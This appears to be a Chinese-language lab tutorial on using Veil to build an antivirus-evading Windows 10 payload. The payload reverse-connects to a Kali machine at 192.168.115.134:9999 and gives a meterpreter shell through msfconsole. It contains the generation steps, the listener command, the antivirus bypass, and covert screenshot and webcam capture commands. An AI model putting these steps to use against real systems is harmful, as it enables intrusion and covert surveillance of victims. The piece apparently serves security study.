Veil生成免杀payload 渗透win10 获取靶机shell
一:實驗環境
兩臺機器處于同網段
攻擊機:kali 192.168.115.134?
靶機:win10 192.168.115.1
二:Veil下載、安裝、使用
kali里默認沒有安裝Veil,我們通過命令行安裝:
apt-get update && apt-get install veil安裝過程有點漫長,如果用的國內源可能會快點。
安裝完成后啟動Veil
?
關于用法上述圖片英文寫的很明白
這里我們使用1) Evasion
list列出可用的有效載荷
payload共有41種,這里我選擇 13號的cs/shellcode_inject/virtual.py
?
進行演示!?從上面可以清楚看到11號payload有很多選項,在這個界面,我們可以對該 payload 進行一些基本的配置。
然后運行"generate"生成有效載荷,我們選擇4帶有shellcode的有效載荷。這里會要求輸入本機的IP:192.168.115.134和該payload使用的端口,我們設置為9999端口
下圖可以看到成功完成以上編譯后,編譯后的文件被保存在?/var/lib/veil/output/compiled/uzi.exe
下。同時新生成的?shellcode?的?rc?文件也被保存在了?/var/lib/veil/output/handlers/uzi.rc下!既然有了?rc?文件,那么我們就可以方便的利用?MSF?進行調用了
在生成的?shellcode?的?rc?文件目錄下運行
msfconsole -r uzi.rc通過session -i發現并未有連接建立這是因為我們的shellcode文件還沒運行。在靶機運行我們的shellcode文件前,來個小插曲我們用360檢驗下它看能否免殺。
結果顯示360殺毒并未進行查殺,所以我們繞過了殺毒軟件。然后在靶機運行該.exe程序。kali立馬監測到連接建立。輸入sessions -i發現ID為1的連接建立
運行sessions -i 1與ID為1的連接會話獲取靶機的shell
然后我們就可以實現一些操作比如,獲取靶機,屏幕截圖,用靶機的攝像頭,拍攝照片,鍵盤監聽文件上傳等。我在這里演示其中兩個:
用screenshot命令獲取靶機屏幕截圖,然后保存在下圖所示目錄
我們用命令行查看下圖片
?
下面來點更刺激的,用靶機的攝像頭拍攝照片
命令是:
meterpreter > webcam_snap?
輸入命令查看
root@kali:~# display /var/lib/veil/output/handlers/leUhWlQC.jpeg本人太丑所以用可愛的小兔兔代替了。
更多操作參考:https://blog.csdn.net/nzjdsds/article/details/77916706
本教程僅供學習交流
?
總結
以上是生活随笔為你收集整理的Veil生成免杀payload 渗透win10 获取靶机shell的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 红队技巧-域渗透的协议利用
- 下一篇: 织梦dedecms的框架的Webshel